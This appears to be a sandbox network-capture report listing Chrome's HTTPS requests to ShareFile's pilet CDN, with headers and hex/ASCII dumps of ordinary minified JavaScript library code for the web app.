                                                                                                                                                                                                                                                                                Data Ascii: s[e]=this.observers[e].filter((function(e){return e!==t})):delete this.observers[e])}},{key:"emit",value:function(e){for(var t=arguments.length,r=new Array(t>1?t-1:0),n=1;n<t;n++)r[n-1]=arguments[n];this.observers[e]&&[].concat(this.observers[e]).forEach(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2c 6e 29 3a 74 68 69 73 2e 72 65 73 6f 75 72 63 65 53 74 6f 72 65 2e 67 65 74 52 65 73 6f 75 72 63 65 28 65 2c 74 2c 72 2c 6e 29 7d 7d 5d 2c 5b 7b 6b 65 79 3a 22 68 61 73 44 65 66 61 75 6c 74 56 61 6c 75 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 64 65 66 61 75 6c 74 56 61 6c 75 65 22 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 26 26 74 3d 3d 3d 72 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 32 29 26 26 75 6e 64 65 66 69 6e 65 64 21 3d 3d 65 5b 72 5d 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 7d 5d 29 2c 72 7d 28 6a 74 29 3b 66 75 6e 63 74 69 6f 6e 20 72 72 28 65 29 7b
                                                                                                                                                                                                                                                                                Data Ascii: ,n):this.resourceStore.getResource(e,t,r,n)}}],[{key:"hasDefaultValue",value:function(e){var t="defaultValue";for(var r in e)if(Object.prototype.hasOwnProperty.call(e,r)&&t===r.substring(0,12)&&undefined!==e[r])return!0;return!1}}]),r}(jt);function rr(e){
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2c 31 30 29 29 7d 7d 29 29 7d 72 65 74 75 72 6e 7b 66 6f 72 6d 61 74 4e 61 6d 65 3a 74 2c 66 6f 72 6d 61 74 4f 70 74 69 6f 6e 73 3a 72 7d 7d 28 74 29 2c 73 3d 69 2e 66 6f 72 6d 61 74 4e 61 6d 65 2c 61 3d 69 2e 66 6f 72 6d 61 74 4f 70 74 69 6f 6e 73 3b 69 66 28 6f 2e 66 6f 72 6d 61 74 73 5b 73 5d 29 7b 76 61 72 20 75 3d 65 3b 74 72 79 7b 76 61 72 20 63 3d 6e 26 26 6e 2e 66 6f 72 6d 61 74 50 61 72 61 6d 73 26 26 6e 2e 66 6f 72 6d 61 74 50 61 72 61 6d 73 5b 6e 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 6b 65 79 5d 7c 7c 7b 7d 2c 6c 3d 63 2e 6c 6f 63 61 6c 65 7c 7c 63 2e 6c 6e 67 7c 7c 6e 2e 6c 6f 63 61 6c 65 7c 7c 6e 2e 6c 6e 67 7c 7c 72 3b 75 3d 6f 2e 66 6f 72 6d 61 74 73 5b 73 5d 28 65 2c 6c 2c 70 72 28 70 72 28 70 72 28 7b 7d 2c 61 29 2c 6e 29 2c 63 29 29
                                                                                                                                                                                                                                                                                Data Ascii: ,10))}}))}return{formatName:t,formatOptions:r}}(t),s=i.formatName,a=i.formatOptions;if(o.formats[s]){var u=e;try{var c=n&&n.formatParams&&n.formatParams[n.interpolationkey]||{},l=c.locale||c.lng||n.locale||n.lng||r;u=o.formats[s](e,l,pr(pr(pr({},a),n),c))


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                39192.168.2.64976113.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC419OUTGET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 199868
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Jul 2024 08:42:51 GMT
                                                                                                                                                                                                                                                                                ETag: "114e798d503a347aab2a537702e1593f"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 cb33a7a4640adbb55df3e0d143601558.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: lV3ZMm-4yf3nNgXtbTM9tG0UHrxAogfu83cEue-g_5YQcIWITotfCA==
                                                                                                                                                                                                                                                                                Age: 45972
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 61 73 6b 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProp
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 76 69 65 77 22 2c 65 5b 65 2e 52 65 71 75 69 72 65 73 50 72 65 76 69 65 77 3d 33 32 5d 3d 22 52 65 71 75 69 72 65 73 50 72 65 76 69 65 77 22 2c 65 5b 65 2e 50 72 6f 63 65 73 73 69 6e 67 3d 36 34 5d 3d 22 50 72 6f 63 65 73 73 69 6e 67 22 2c 65 5b 65 2e 46 61 69 6c 65 64 3d 31 32 38 5d 3d 22 46 61 69 6c 65 64 22 7d 28 79 7c 7c 28 79 3d 7b 7d 29 29 3b 76 61 72 20 76 2c 62 3d 7b 44 65 66 61 75 6c 74 3a 22 44 65 66 61 75 6c 74 22 2c 46 6f 6c 64 65 72 73 46 69 72 73 74 3a 22 46 6f 6c 64 65 72 73 46 69 72 73 74 22 2c 55 73 65 46 6f 6c 64 65 72 4f 70 74 69 6f 6e 73 3a 22 55 73 65 46 6f 6c 64 65 72 4f 70 74 69 6f 6e 73 22 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 4e 6f 6e 65 3d 30 5d 3d 22 4e 6f 6e 65 22 2c 65 5b 65 2e 41 6e 6f 6e 79 6d 6f 75 73 3d
                                                                                                                                                                                                                                                                                Data Ascii: view",e[e.RequiresPreview=32]="RequiresPreview",e[e.Processing=64]="Processing",e[e.Failed=128]="Failed"}(y||(y={}));var v,b={Default:"Default",FoldersFirst:"FoldersFirst",UseFolderOptions:"UseFolderOptions"};!function(e){e[e.None=0]="None",e[e.Anonymous=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 63 74 28 65 29 26 26 21 30 3d 3d 3d 65 2e 69 73 41 78 69 6f 73 45 72 72 6f 72 7d 7d 2c 35 37 35 34 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 34 35 31 35 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 2f 28 6d 73 69 65 7c 74 72 69 64 65 6e 74 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 72 3d 65 3b 72 65 74 75 72 6e 20 74 26 26 28 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22
                                                                                                                                                                                                                                                                                Data Ascii: ct(e)&&!0===e.isAxiosError}},57546:(e,t,n)=>{"use strict";var r=n(84515);e.exports=r.isStandardBrowserEnv()?function(){var e,t=/(msie|trident)/i.test(navigator.userAgent),n=document.createElement("a");function o(e){var r=e;return t&&(n.setAttribute("href"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC15357INData Raw: 53 70 61 63 69 6e 67 7c 63 68 61 6c 6c 65 6e 67 65 7c 63 68 61 72 53 65 74 7c 63 68 65 63 6b 65 64 7c 63 69 74 65 7c 63 6c 61 73 73 49 44 7c 63 6c 61 73 73 4e 61 6d 65 7c 63 6f 6c 73 7c 63 6f 6c 53 70 61 6e 7c 63 6f 6e 74 65 6e 74 7c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 7c 63 6f 6e 74 65 78 74 4d 65 6e 75 7c 63 6f 6e 74 72 6f 6c 73 7c 63 6f 6e 74 72 6f 6c 73 4c 69 73 74 7c 63 6f 6f 72 64 73 7c 63 72 6f 73 73 4f 72 69 67 69 6e 7c 64 61 74 61 7c 64 61 74 65 54 69 6d 65 7c 64 65 63 6f 64 69 6e 67 7c 64 65 66 61 75 6c 74 7c 64 65 66 65 72 7c 64 69 72 7c 64 69 73 61 62 6c 65 64 7c 64 69 73 61 62 6c 65 50 69 63 74 75 72 65 49 6e 50 69 63 74 75 72 65 7c 64 6f 77 6e 6c 6f 61 64 7c 64 72 61 67 67 61 62 6c 65 7c 65 6e 63 54 79 70 65 7c 65 6e 74 65 72 4b 65
                                                                                                                                                                                                                                                                                Data Ascii: Spacing|challenge|charSet|checked|cite|classID|className|cols|colSpan|content|contentEditable|contextMenu|controls|controlsList|coords|crossOrigin|data|dateTime|decoding|default|defer|dir|disabled|disablePictureInPicture|download|draggable|encType|enterKe
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 6f 63 75 73 3a 63 2e 4d 45 2c 69 6e 70 75 74 42 6f 72 64 65 72 3a 63 2e 69 59 2c 69 6e 70 75 74 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 4d 6a 2c 69 6e 70 75 74 48 6f 76 65 72 42 6f 72 64 65 72 3a 63 2e 5a 5f 2c 65 72 72 6f 72 42 6f 72 64 65 72 3a 63 2e 73 52 2c 65 72 72 6f 72 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 4d 36 2c 77 61 72 6e 69 6e 67 42 6f 72 64 65 72 3a 63 2e 65 65 2c 77 61 72 6e 69 6e 67 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 4a 30 2c 73 75 63 63 65 73 73 42 6f 72 64 65 72 3a 63 2e 64 76 2c 73 75 63 63 65 73 73 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 45 62 2c 69 6e 66 6f 42 6f 72 64 65 72 3a 63 2e 5a 4d 2c 69 6e 66 6f 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 71 69 2c 6d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3a 63 2e 4d 6a 2c 62 6c 61 64 65 42
                                                                                                                                                                                                                                                                                Data Ascii: ocus:c.ME,inputBorder:c.iY,inputBackground:c.Mj,inputHoverBorder:c.Z_,errorBorder:c.sR,errorBackground:c.M6,warningBorder:c.ee,warningBackground:c.J0,successBorder:c.dv,successBackground:c.Eb,infoBorder:c.ZM,infoBackground:c.qi,modalBackground:c.Mj,bladeB
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 3e 3e 32 31 29 2b 6e 7c 30 29 5e 6e 5e 72 29 2b 74 5b 31 35 5d 2b 35 33 30 37 34 32 35 32 30 7c 30 29 3c 3c 31 36 7c 6f 3e 3e 3e 31 36 29 2b 69 7c 30 29 5e 69 5e 6e 29 2b 74 5b 32 5d 2d 39 39 35 33 33 38 36 35 31 7c 30 29 3c 3c 32 33 7c 72 3e 3e 3e 39 29 2b 6f 7c 30 2c 72 3d 28 28 72 2b 3d 28 28 69 3d 28 28 69 2b 3d 28 72 5e 28 28 6e 3d 28 28 6e 2b 3d 28 6f 5e 28 72 7c 7e 69 29 29 2b 74 5b 30 5d 2d 31 39 38 36 33 30 38 34 34 7c 30 29 3c 3c 36 7c 6e 3e 3e 3e 32 36 29 2b 72 7c 30 29 7c 7e 6f 29 29 2b 74 5b 37 5d 2b 31 31 32 36 38 39 31 34 31 35 7c 30 29 3c 3c 31 30 7c 69 3e 3e 3e 32 32 29 2b 6e 7c 30 29 5e 28 28 6f 3d 28 28 6f 2b 3d 28 6e 5e 28 69 7c 7e 72 29 29 2b 74 5b 31 34 5d 2d 31 34 31 36 33 35 34 39 30 35 7c 30 29 3c 3c 31 35 7c 6f 3e 3e 3e 31 37 29
                                                                                                                                                                                                                                                                                Data Ascii: >>21)+n|0)^n^r)+t[15]+530742520|0)<<16|o>>>16)+i|0)^i^n)+t[2]-995338651|0)<<23|r>>>9)+o|0,r=((r+=((i=((i+=(r^((n=((n+=(o^(r|~i))+t[0]-198630844|0)<<6|n>>>26)+r|0)|~o))+t[7]+1126891415|0)<<10|i>>>22)+n|0)^((o=((o+=(n^(i|~r))+t[14]-1416354905|0)<<15|o>>>17)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 74 79 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 28 5b 2e 2a 2b 3f 5e 3d 21 3a 24 7b 7d 28 29 7c 5b 5c 5d 5c 2f 5c 5c 5d 29 2f 67 2c 22 5c 5c 24 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 55 6e 64 65 66 69 6e 65 64 22 3a 53 74 72 69 6e 67 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 22 41 72 72 61 79 22 3d 3d 3d 63 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 3d 7b 7d 3b 69 66 28 22 52 65 67 45 78 70 22 3d 3d 3d 63 28 74 29 29
                                                                                                                                                                                                                                                                                Data Ascii: ty;function u(e){return e.replace(/([.*+?^=!:${}()|[\]\/\\])/g,"\\$1")}function c(e){return e===undefined?"Undefined":String(Object.prototype.toString.call(e)).slice(8,-1)}function l(e){return"Array"===c(e)}function d(e,t){var n,r,o={};if("RegExp"===c(t))
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC14808INData Raw: 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2d 5d 27 29 3b 65 3d 6e 2e 68 6f 73 74 6e 61 6d 65 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 70 72 65 76 65 6e 74 49 6e 76 61 6c 69 64 48 6f 73 74 6e 61 6d 65 26 26 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 48 6f 73 74 6e 61 6d 65 28 65 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 29 7d 72 65 74 75 72 6e 20 45 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 29 7d 2c 61 2e 6f 72 69 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 29 72 65 74 75 72 6e 20 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 22 3a 74 68 69 73 3b 69 66 28 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                Data Ascii: ntains characters other than [A-Z0-9.-]');e=n.hostname,this._parts.preventInvalidHostname&&i.ensureValidHostname(e,this._parts.protocol)}return E.call(this,e,t)},a.origin=function(e,t){if(this._parts.urn)return e===undefined?"":this;if(e===undefined){var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 30 2c 6b 3d 68 2c 78 3d 70 3b 66 6f 72 28 28 6e 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 6d 29 29 3c 30 26 26 28 6e 3d 30 29 2c 72 3d 30 3b 72 3c 6e 3b 2b 2b 72 29 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 3e 3d 31 32 38 26 26 43 28 22 6e 6f 74 2d 62 61 73 69 63 22 29 2c 62 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 29 3b 66 6f 72 28 6f 3d 6e 3e 30 3f 6e 2b 31 3a 30 3b 6f 3c 77 3b 29 7b 66 6f 72 28 69 3d 53 2c 61 3d 31 2c 64 3d 75 3b 6f 3e 3d 77 26 26 43 28 22 69 6e 76 61 6c 69 64 2d 69 6e 70 75 74 22 29 2c 28 28 66 3d 28 76 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2b 2b 29 29 2d 34 38 3c 31 30 3f 76 2d 32 32 3a 76 2d 36 35 3c 32 36 3f 76 2d 36 35 3a 76 2d 39 37 3c 32 36 3f 76 2d 39 37 3a 75 29 3e 3d 75 7c 7c 66 3e 5f 28 28
                                                                                                                                                                                                                                                                                Data Ascii: 0,k=h,x=p;for((n=e.lastIndexOf(m))<0&&(n=0),r=0;r<n;++r)e.charCodeAt(r)>=128&&C("not-basic"),b.push(e.charCodeAt(r));for(o=n>0?n+1:0;o<w;){for(i=S,a=1,d=u;o>=w&&C("invalid-input"),((f=(v=e.charCodeAt(o++))-48<10?v-22:v-65<26?v-65:v-97<26?v-97:u)>=u||f>_((
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 69 2e 61 63 74 69 6f 6e 73 28 22 50 72 6f 74 6f 63 6f 6c 4c 69 6e 6b 73 22 29 2c 69 2e 75 72 69 28 65 29 2c 69 2e 61 63 74 69 6f 6e 73 28 22 50 72 6f 74 6f 63 6f 6c 4c 69 6e 6b 73 22 2c 74 29 2c 69 2e 61 63 74 69 6f 6e 73 28 22 49 6e 74 65 72 6e 61 6c 22 29 2c 69 2e 71 75 65 72 79 53 74 72 69 6e 67 28 7b 61 63 74 69 6f 6e 3a 6e 2c 66 69 6c 65 4e 61 6d 65 3a 72 7d 29 2c 69 2e 6d 65 74 68 6f 64 28 22 47 45 54 22 29 2c 69 7d 2c 65 2e 67 65 74 52 65 64 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 6f 2e 41 45 3b 72 65 74 75 72 6e 20 74 2e 66 72 6f 6d 28 22 49 74 65 6d 73 22 29 2c 74 2e 61 63 74 69 6f 6e 73 28 22 52 65 64 69 72 65 63 74 69 6f 6e 22 29 2c 74 2e 75 72 69 28 65 29 2c 74 2e 6d 65 74 68 6f 64 28 22 47
                                                                                                                                                                                                                                                                                Data Ascii: i.actions("ProtocolLinks"),i.uri(e),i.actions("ProtocolLinks",t),i.actions("Internal"),i.queryString({action:n,fileName:r}),i.method("GET"),i},e.getRedirection=function(e){var t=new o.AE;return t.from("Items"),t.actions("Redirection"),t.uri(e),t.method("G


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                40192.168.2.64976413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC573OUTGET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Jul 2024 08:42:51 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: MPpRONF1b8y1V8ecgqn_QL8fauf5fqRYrtPqQX9fTz4W0ZKbm-MF1A==
                                                                                                                                                                                                                                                                                Age: 45971
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                41192.168.2.64976213.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC600OUTGET /sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 690173
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 10:38:20 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 09 Oct 2024 10:30:30 GMT
                                                                                                                                                                                                                                                                                ETag: "66960f160a996198483c9b80db9bb067"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c2a926ef1bafe1ab239d4761594a8098.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 8BF4gL4LZa4AGtR-j0mIiMhHJ7AF4Mw8f27SO6AQbNKBnM0yx8SXTQ==
                                                                                                                                                                                                                                                                                Age: 26814
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6d 70 6c 61 74 65 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 6c 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},s={},i={},o={},l={},u={};retu
